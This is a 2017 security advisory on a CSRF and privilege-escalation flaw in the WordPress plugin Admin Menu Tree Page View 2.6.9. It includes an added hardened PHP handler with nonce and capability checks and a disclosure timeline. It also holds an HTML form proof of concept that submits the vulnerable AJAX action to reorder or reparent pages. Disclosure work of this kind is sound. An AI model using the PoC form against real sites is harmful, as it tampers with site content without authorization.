Admin Menu Tree Page View [CSRF, Privilege Escalation]
Description
The plugin registers the AJAX action admin_menu_tree_page_view_move_page, which is handled by the function admin_menu_tree_page_view_move_page. The latter does not implement any anti-CSRF controls (nonce verification) or other security checks.
By exploiting this vulnerability a malicious actor can only change the order and/or the parent of the specified pages, so the damage is minimal.
The AJAX action is a privileged one (wp_ajax_ prefix), so it is only available to logged-in users. Even so, it does not implement any capability checks, so it is available to all registered users regardless of their access level. This allows any registered user to change the order and/or parent of pages.
Exploiting this vulnerability could lead to a minor loss of data integrity, but considering the complexity of the attack and the limited outcome for an attacker, exploitation of this vulnerability seems rather unlikely.
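The two missing controls described above (a nonce check against CSRF and a capability check against privilege escalation) are the standard WordPress fix for this class of bug. The following hardened handler is an added example written for this advisory; it is not the plugin's code and not the vendor's patch. The function names prefixed amtpv_, the nonce action name 'amtpv_move_page', the script handle 'amtpv-admin' and the simplified reordering helper are all assumptions made for the example; the request parameter names are the ones shown in the PoC below.

```php
<?php
// Added example: a hardened version of the move-page AJAX handler.
// Names prefixed amtpv_ and the nonce action are assumptions, not the plugin's.

// wp_ajax_ (without nopriv) limits the action to logged-in users, but that
// is only authentication, not authorization, and gives no CSRF protection.
add_action( 'wp_ajax_admin_menu_tree_page_view_move_page', 'amtpv_move_page_handler' );

function amtpv_move_page_handler() {
    // 1. Anti-CSRF: the request must carry a nonce minted for this action.
    //    check_ajax_referer() calls wp_die() on failure, so a form submitted
    //    from a foreign origin never reaches the update code below.
    check_ajax_referer( 'amtpv_move_page', 'nonce' );

    $post_id   = isset( $_POST['post_to_update_id'] ) ? absint( $_POST['post_to_update_id'] ) : 0;
    $target_id = isset( $_POST['aboveOrNextPostID'] ) ? absint( $_POST['aboveOrNextPostID'] ) : 0;
    $direction = isset( $_POST['direction'] ) ? sanitize_key( $_POST['direction'] ) : '';

    // 2. Input validation: only the three documented directions are accepted.
    if ( ! $post_id || ! $target_id || ! in_array( $direction, array( 'inside', 'up', 'down' ), true ) ) {
        wp_send_json_error( array( 'message' => 'invalid parameters' ), 400 );
    }

    // 3. Capability check: being logged in is not enough. The caller must be
    //    allowed to edit the page being moved, and when the page becomes a
    //    child of the target, the caller must be allowed to edit the target too.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    if ( 'inside' === $direction && ! current_user_can( 'edit_post', $target_id ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    $result = amtpv_move_page_update( $post_id, $target_id, $direction );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => $result->get_error_message() ), 400 );
    }
    wp_send_json_success( array( 'post_id' => $post_id ) );
}

// Simplified reordering helper (assumption: a stand-in for the plugin's own logic).
function amtpv_move_page_update( $post_id, $target_id, $direction ) {
    $target = get_post( $target_id );
    if ( ! $target || 'page' !== $target->post_type ) {
        return new WP_Error( 'bad_target', 'target is not a page' );
    }
    $args = array( 'ID' => $post_id );
    if ( 'inside' === $direction ) {
        $args['post_parent'] = $target_id;
        $args['menu_order']  = 0;
    } else {
        $args['post_parent'] = $target->post_parent;
        $args['menu_order']  = ( 'up' === $direction ) ? $target->menu_order - 1 : $target->menu_order + 1;
    }
    $updated = wp_update_post( $args, true );
    return is_wp_error( $updated ) ? $updated : true;
}

// The legitimate admin UI must send the nonce with every request, so expose it
// to the script that issues the AJAX call (script handle 'amtpv-admin' is assumed).
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'amtpv-admin', 'amtpvData', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'amtpv_move_page' ),
    ) );
} );
```

The admin script then posts `nonce: amtpvData.nonce` together with the three existing parameters. With both checks in place, a cross-site form submission fails at check_ajax_referer() before any database write, and a logged-in user without edit rights on the affected pages receives a 403 instead of silently reordering the tree.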
PoC
Use the following form to change the order or the parent of pages.
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="admin_menu_tree_page_view_move_page">
<input type="text" name="post_to_update_id" placeholder="page to move">
<input type="text" name="aboveOrNextPostID" placeholder="target page">
<input type="text" name="direction" placeholder="can be one of inside, up or down">
<button type="submit" value="Submit">Submit</button>
</form>
- 12 December 2017
- Pan Vag
- eskapism.se
- wordpress.org
- 2.6.9
- WordPress 4.8.1
- 2017-12-12: Discovered
- 2017-12-23: Vendor notified by email
- 2018-01-07: Patch released